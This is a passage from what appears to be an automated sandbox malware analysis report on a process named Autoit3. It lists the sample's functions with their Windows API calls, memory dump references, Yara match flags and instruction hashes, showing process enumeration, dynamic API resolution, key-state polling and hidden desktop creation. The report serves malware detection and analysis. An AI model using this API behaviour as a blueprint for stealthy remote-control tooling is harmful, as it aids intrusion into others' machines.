                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 03CDAF6A
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 03CDAF7C
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 03CDAF8E
                                      • Process32Next.KERNEL32(00000000,00000128), ref: 03CDB121
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$HandleModuleNextProcess32
                                      • String ID:
                                      • API String ID: 2237597116-0
                                      • Opcode ID: 93b84616e8f01897533bdb028ecafd9f0a030561d81091eb06fa095667988100
                                      • Instruction ID: 3a12a93fcf7e2f73e9bf2d6dae13c86ff0f6faa3ccdbd49fe78c2e177446570a
                                      • Opcode Fuzzy Hash: 93b84616e8f01897533bdb028ecafd9f0a030561d81091eb06fa095667988100
                                      • Instruction Fuzzy Hash: EFC0805361162017CA10B5F53C844D3878CCD590B33090562B605D7101D22A4C14A390
                                      Function 03CDB0D0 Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 03CDAE54: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,03CDB0DB,00000000,?,03CEB350,00000000,03CEB636,?,?,?,?,00000000,00000000), ref: 03CDAE68
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 03CDAE80
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 03CDAE92
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 03CDAEA4
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 03CDAEB6
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 03CDAEC8
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 03CDAEDA
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32First), ref: 03CDAEEC
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 03CDAEFE
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 03CDAF10
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 03CDAF22
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 03CDAF34
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 03CDAF46
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32First), ref: 03CDAF58
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 03CDAF6A
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 03CDAF7C
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 03CDAF8E
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03CDB0E1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 2242398760-0
                                      • Opcode ID: 669f63a559b838472ea0148715926dfef36899811c19ad7bc295b98b9a1e5a92
                                      • Instruction ID: d96e06b53596ecf52065243ac23f12e58ebda103943724e61540b9ed36ad273a
                                      • Opcode Fuzzy Hash: 669f63a559b838472ea0148715926dfef36899811c19ad7bc295b98b9a1e5a92
                                      • Instruction Fuzzy Hash: 02C08CE36022201BDA20B6F93C888D3878CCD991F330904A2BA09D7202D2298C10A2E0
                                      Function 03CDB0F0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 03CDAE54: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,03CDB0DB,00000000,?,03CEB350,00000000,03CEB636,?,?,?,?,00000000,00000000), ref: 03CDAE68
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 03CDAE80
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 03CDAE92
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 03CDAEA4
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 03CDAEB6
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 03CDAEC8
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 03CDAEDA
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32First), ref: 03CDAEEC
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 03CDAEFE
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 03CDAF10
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 03CDAF22
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 03CDAF34
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 03CDAF46
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32First), ref: 03CDAF58
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 03CDAF6A
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 03CDAF7C
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 03CDAF8E
                                      • Process32First.KERNEL32(00000000,00000128), ref: 03CDB101
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$FirstHandleModuleProcess32
                                      • String ID:
                                      • API String ID: 2774106396-0
                                      • Opcode ID: 21bfb5612ca7519054580218cdd77cce5cbf070cb9776d990a9c2e9c2cf0d282
                                      • Instruction ID: 037f117a2ad2d914980328bac8dfe897c25eef495f5f3730e7e39d692888215b
                                      • Opcode Fuzzy Hash: 21bfb5612ca7519054580218cdd77cce5cbf070cb9776d990a9c2e9c2cf0d282
                                      • Instruction Fuzzy Hash: 1DC08CA3A122201BCB20F6F93CC88D3878CDD590B330905A2FA0AD7202D22A8C14B2A0
                                      Function 008013C7 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 008013C8
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                        • Part of subcall function 00802714: GetCursorPos.USER32(?), ref: 00802727
                                        • Part of subcall function 00802714: ScreenToClient.USER32(008C77B0,?), ref: 00802744
                                        • Part of subcall function 00802714: GetAsyncKeyState.USER32(00000001), ref: 00802769
                                        • Part of subcall function 00802714: GetAsyncKeyState.USER32(00000002), ref: 00802777
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AsyncStateWindow$ClientCursorForegroundLongScreen
                                      • String ID:
                                      • API String ID: 4074248120-0
                                      • Opcode ID: 54af45024c2b67e935900e94b089aa8daa7248943c035263b0624ad5f160df8f
                                      • Instruction ID: bc2090577368b34fe709a31610116568b6f7b3501627e36e1556bf0e3458456d
                                      • Opcode Fuzzy Hash: 54af45024c2b67e935900e94b089aa8daa7248943c035263b0624ad5f160df8f
                                      • Instruction Fuzzy Hash: 77D05E302000105BC954A75C9C4DE5E3765FF45330B184615F515CB2E1CB725C52CEA6
                                      Function 03CC4BAC Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeString
                                      • String ID:
                                      • API String ID: 3341692771-0
                                      • Opcode ID: 4a835d830b45d8efaa41f9c2d980658df14287f71c860b080632fe162d2af2c5
                                      • Instruction ID: c31abbb58d553aa99871c2ef6c3cfcf6348f3838bd41bb9dd0ecc1e5c17337cb
                                      • Opcode Fuzzy Hash: 4a835d830b45d8efaa41f9c2d980658df14287f71c860b080632fe162d2af2c5
                                      • Instruction Fuzzy Hash: E5C08CBC9313C26DFF0EEF33492597BA39CEE9110138E856CEC02CC002DA24E5426628
                                      Function 0082547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __wfsopen
                                      • String ID:
                                      • API String ID: 197181222-0
                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                      • Instruction ID: 041a9fc10dc8e09325d5773222101474eb659ea7c4adc7ec8ccaf0ee6824f47a
                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                      • Instruction Fuzzy Hash: 13B092B648020C77CE012A86FC03A697B29AB40668F408020FB0C6C162A673A6A0968A
                                      Function 03CE7458 Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(00000000,03D23A94,03CE74F2,00000000,03CE7CC3,?,00000000,03CE7CE0), ref: 03CE7463
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 572d56aa8742d40c19f64204b36ef036639bc2fb8981892feb8b1842e28b82ca
                                      • Instruction ID: de56eb92fdb329fcdb9e2ee5c0447a142ca222b32764012ccbe2f8a0c68b76ff
                                      • Opcode Fuzzy Hash: 572d56aa8742d40c19f64204b36ef036639bc2fb8981892feb8b1842e28b82ca
                                      • Instruction Fuzzy Hash: 0DA001AABA1380268A45B6BA1DE490A468C6A581123965979E109DB242DD69C8643124
                                      Function 03CC176C Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 03CC1805
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 3a5eb3ab3680525a798d46aa179450cfa81b14b08f86196867fd1d73819517c3
                                      • Instruction ID: d228fc07425bc60ef85e9dd4afd47dbd94493bfaae50fc2fec2f861596af7527
                                      • Opcode Fuzzy Hash: 3a5eb3ab3680525a798d46aa179450cfa81b14b08f86196867fd1d73819517c3
                                      • Instruction Fuzzy Hash: A921CEB66182869FC750CF2DC880A5AB7E4FF88350B28896DF999CB345D330E944CB52
                                      Function 011CFD61 Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 011CFDFA
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 58c02b4aefddd53cdc7f0858ee0c929407db5a46c44ebbc669d8b4e69910777a
                                      • Instruction ID: aa36fae81d20131c3af5bdf7558881de2f7c169321d7047444d1f3cd4a2f64c6
                                      • Opcode Fuzzy Hash: 58c02b4aefddd53cdc7f0858ee0c929407db5a46c44ebbc669d8b4e69910777a
                                      • Instruction Fuzzy Hash: F921FEB5604246DFCB54CF2CC880A9AB7E1FF98B10F248928F999CB345D330E955CB92
                                      Function 03CF441C Relevance: 1.3, APIs: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 03CDB0D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03CDB0E1
                                        • Part of subcall function 03CDB0F0: Process32First.KERNEL32(00000000,00000128), ref: 03CDB101
                                      • CloseHandle.KERNEL32(?,03CF4502), ref: 03CF44F5
                                        • Part of subcall function 03CDB110: Process32Next.KERNEL32(00000000,00000128), ref: 03CDB121
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 0ed134d3b32308626bd52b0eb006dced13fe04040c577c794a1115e6912c398d
                                      • Instruction ID: d1395d5caf23e2f6973a6f9a586ddf6b52173f3d8b8d73bc84f605960d1541e8
                                      • Opcode Fuzzy Hash: 0ed134d3b32308626bd52b0eb006dced13fe04040c577c794a1115e6912c398d
                                      • Instruction Fuzzy Hash: 1421D574904B08AFDB59DF62CC609DEBBF9FB49700F4284B5FA14E2610EA345B50DA10
                                      Function 03CC182C Relevance: 1.3, APIs: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualFree.KERNEL32(?,?,00004000), ref: 03CC18BC
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 9570bea50f531c909f8f14ce2c38f2c923584b763fb9ad539afedd86785ebb2a
                                      • Instruction ID: 9dd69dc298fbd07b24bbef2c270818ed3fdbdf83de483a11f17734c8ccbfe044
                                      • Opcode Fuzzy Hash: 9570bea50f531c909f8f14ce2c38f2c923584b763fb9ad539afedd86785ebb2a
                                      • Instruction Fuzzy Hash: 59210EB6A18342CFC710CF29D880A1AB7E4FF98310B2849A9E994CB304D330E908CF52
                                      Function 011CFE21 Relevance: 1.3, APIs: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualFree.KERNEL32(?,?,00004000), ref: 011CFEB1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 974c0e817647fc61280f705dd8f750cf8ac000e231c02660e3c42b497fdb3524
                                      • Instruction ID: 55c23309c53036fe9cde0ad14e6b1ad1778bd9ec7fb203ca9f2a4e18075d3a6b
                                      • Opcode Fuzzy Hash: 974c0e817647fc61280f705dd8f750cf8ac000e231c02660e3c42b497fdb3524
                                      • Instruction Fuzzy Hash: 60210EB4205216CFC724CF2CC880A5AB7E1FF99B14B204969E594CB345D330E909CF62
                                      Function 03CF4724 Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNEL32(00000000,00000000,?,00000000,03CF4829,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,03CF47A8), ref: 03CF478D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: 08caa359f5f6340b23a60eafff36780ed39aab28be1a4e0ae7551238d5c00b32
                                      • Instruction ID: ab23945c4f53c438642639e95103cbd37049a7aa295ac489ce3e7cc5542f067f
                                      • Opcode Fuzzy Hash: 08caa359f5f6340b23a60eafff36780ed39aab28be1a4e0ae7551238d5c00b32
                                      • Instruction Fuzzy Hash: B6014C356503447EE365EAA5CCD2F6FB3ACDB45B10FA24579F610EB1D0D6705E00A150
                                      Function 03CF3F2C Relevance: 1.3, APIs: 1, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 03CF3E5C: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,03CF3EF8,?,00000000,03CF3F18,?,?,?,?), ref: 03CF3EAB
                                        • Part of subcall function 03CF3E5C: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,03CF3EF8,?,00000000,03CF3F18), ref: 03CF3EBA
                                        • Part of subcall function 03CF3E5C: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003), ref: 03CF3EE3
                                        • Part of subcall function 03CF3E5C: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000), ref: 03CF3EE9
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,03CF3FA0,?,00000000,03CF3FC0,?,?,?,?), ref: 03CF3F91
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateFreeHandleReadSizeVirtual
                                      • String ID:
                                      • API String ID: 931541440-0
                                      • Opcode ID: 76dab2d014b828e10d6f7b0598b087a25277357301ca1b4bbe6fca733795286d
                                      • Instruction ID: c23f32a4dfce55a8113d32b63bd668953d3ee566a81a9ddb2810b1f1e0cea4b8
                                      • Opcode Fuzzy Hash: 76dab2d014b828e10d6f7b0598b087a25277357301ca1b4bbe6fca733795286d
                                      • Instruction Fuzzy Hash: ED01D638A04384BFD756DFA6CC61A5DB7F8EB88710F9284F4E510D7650D6346E10DA10
                                      Function 03CF2EF8 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000001,00000000,03CF2F73), ref: 03CF2F2A
                                        • Part of subcall function 03CF3704: CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 03CF37CE
                                        • Part of subcall function 03CF3704: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,03CF38FD,?,?,?), ref: 03CF380F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$DesktopProcessSleep
                                      • String ID:
                                      • API String ID: 4216851738-0
                                      • Opcode ID: 009f2de3f3c98a333b7955e156263404a28db5a522898554ce6aa059f2909c60
                                      • Instruction ID: a177e571f7cffe967df57874f831fbe916ff0ef875190a560d856fea327aaa55
                                      • Opcode Fuzzy Hash: 009f2de3f3c98a333b7955e156263404a28db5a522898554ce6aa059f2909c60
                                      • Instruction Fuzzy Hash: FF017178A14348BFDB41DFA5CC91B8DF7B4EB44700FA284B5D910EB690DB706B00EA44
                                      Function 03CF47B8 Relevance: 1.3, APIs: 1, Instructions: 39sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 03CF4724: CloseHandle.KERNEL32(00000000,00000000,?,00000000,03CF4829,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,03CF47A8), ref: 03CF478D
                                      • Sleep.KERNEL32(00000002,00000000,03CF4829,?,00000001), ref: 03CF4809
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleSleep
                                      • String ID:
                                      • API String ID: 252777609-0
                                      • Opcode ID: 2f16c055615ded50332f3f13093a146576a4b061185029a7c5b7cb6e7d743991
                                      • Instruction ID: 649ccb52f851f98a2c951711fc8562fec4c379797d69f3d2d8454a7d4945fcf1
                                      • Opcode Fuzzy Hash: 2f16c055615ded50332f3f13093a146576a4b061185029a7c5b7cb6e7d743991
                                      • Instruction Fuzzy Hash: 63F02839A103C8EFDB5AEBA6D851A9EF7F8EB48310FA24079D500D7690DB309F00E610
                                      Function 03CF762C Relevance: 1.3, APIs: 1, Instructions: 3sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000002,03CF8045,00000000,03CF8060), ref: 03CF762D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 3b4e6e461124632eeb1bfab29f759c6da9b0b58dd42315f79016377e4217db15
                                      • Instruction ID: aac0ac342d1ba05c2b4f1d20d0cb9105a450af1e6225b7af0f1a54ff7b049fa8
                                      • Opcode Fuzzy Hash: 3b4e6e461124632eeb1bfab29f759c6da9b0b58dd42315f79016377e4217db15
                                      • Instruction Fuzzy Hash:
                                      Function 011DF78D Relevance: .1, Instructions: 106COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11dd000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                      • Instruction ID: bd8b5c5e94d72ecb7e9df4d6f0192b8d58d92d0dea19ae7ad9d6b0e1fdc103bd
                                      • Opcode Fuzzy Hash: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                      • Instruction Fuzzy Hash: 8E31D721504623AAEF2D4A6CCC42BA7BB58FF42328F140325E55797582D730A75BC7B3
                                      Function 011D2041 Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 16b0cc3bcb8efeb96049929d558b67534c5615ae68d88d7ee03b1c497bca4c1a
                                      • Instruction ID: dc0a042cee0c4f21f23c744b44ac10563649e949d27198a8f66d5a114d2d01df
                                      • Opcode Fuzzy Hash: 16b0cc3bcb8efeb96049929d558b67534c5615ae68d88d7ee03b1c497bca4c1a
                                      • Instruction Fuzzy Hash: B0012832A08608DFD728CF5DD8C095AFBF9FB45320B5681BAE528D3690D731AC50CA50
                                      Function 011D7281 Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: 26a5afddb47bbaaf6a7ee82dbb94c88b565efd795d1168443424a1c7cecc16fe
                                      • Instruction ID: b34ba96737156c7d27970e3d40cddc9b2a83f2110f694b8751efd674a6652cb0
                                      • Opcode Fuzzy Hash: 26a5afddb47bbaaf6a7ee82dbb94c88b565efd795d1168443424a1c7cecc16fe
                                      • Instruction Fuzzy Hash: 7AF05430A04248EFDB09DFA9DC9199DF7B8EB48314F9085B4E814E3690EB755F10DA50
                                      Function 011D20B1 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d2b3ba18dd8ecedbb045a92215fd6446520881362c05d2e362cce49d0ebf1c84
                                      • Instruction ID: c4ba340c3833c1939aad385c5b5b21c9cd93f93ea6126160f73c0e10b4afc426
                                      • Opcode Fuzzy Hash: d2b3ba18dd8ecedbb045a92215fd6446520881362c05d2e362cce49d0ebf1c84
                                      • Instruction Fuzzy Hash: 87E042B490BA998ED76CDFA5E50460A7AE2F76870CB52817AC42887208E3788095CF01
                                      Function 011CE796 Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9831eed8d6eda24d68a497421f123d12ba3802675b8b2256879e16f8b4b7be92
